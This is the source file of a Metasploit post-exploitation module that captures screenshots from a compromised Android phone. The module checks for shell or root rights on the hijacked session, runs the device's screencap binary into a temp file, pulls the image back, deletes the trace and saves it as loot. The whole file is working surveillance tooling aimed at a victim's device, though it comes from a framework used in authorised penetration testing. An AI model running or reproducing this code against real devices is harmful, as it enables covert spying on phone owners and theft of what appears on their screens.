modules/post/android/capture/screen.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::Common
include Msf::Post::File
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Android Screen Capture',
'Description' => %q{
This module takes a screenshot of the target phone.
},
'License' => MSF_LICENSE,
'Author' => [ 'timwr' ],
'Platform' => [ 'android' ],
'SessionTypes' => [ 'shell', 'meterpreter' ]
)
)
register_options(
[
OptString.new('TMP_PATH', [true, 'Path to remote temp directory', '/data/local/tmp/']),
OptString.new('EXE_PATH', [true, 'Path to remote screencap executable', '/system/bin/screencap'])
]
)
end
def run
id = cmd_exec('id')
unless id =~ (/root/) || id =~ (/shell/)
print_error('This module requires shell or root permissions')
return
end
exe_path = datastore['EXE_PATH']
tmp_path = datastore['TMP_PATH']
if !file?(exe_path)
print_error('Aborting, screencap binary not found.')
return
end
begin
file = "#{tmp_path}/#{Rex::Text.rand_text_alpha(7)}.png"
cmd_exec("#{exe_path} -p #{file}")
print_good('Downloading screenshot...')
data = read_file(file)
file_rm(file)
rescue ::Rex::Post::Meterpreter::RequestError => e
print_error('Error taking the screenshot')
vprint_error("#{e.class} #{e} #{e.backtrace}")
return
end
unless data
print_error('No data for screenshot')
return
end
begin
fn = 'screenshot.png'
location = store_loot('screen_capture.screenshot', 'image/png', session, data, fn, 'Screenshot')
print_good("Screenshot saved at #{location}")
rescue ::IOError, ::Errno::ENOENT => e
print_error('Error storing screenshot')
vprint_error("#{e.class} #{e} #{e.backtrace}")
return
end
end
end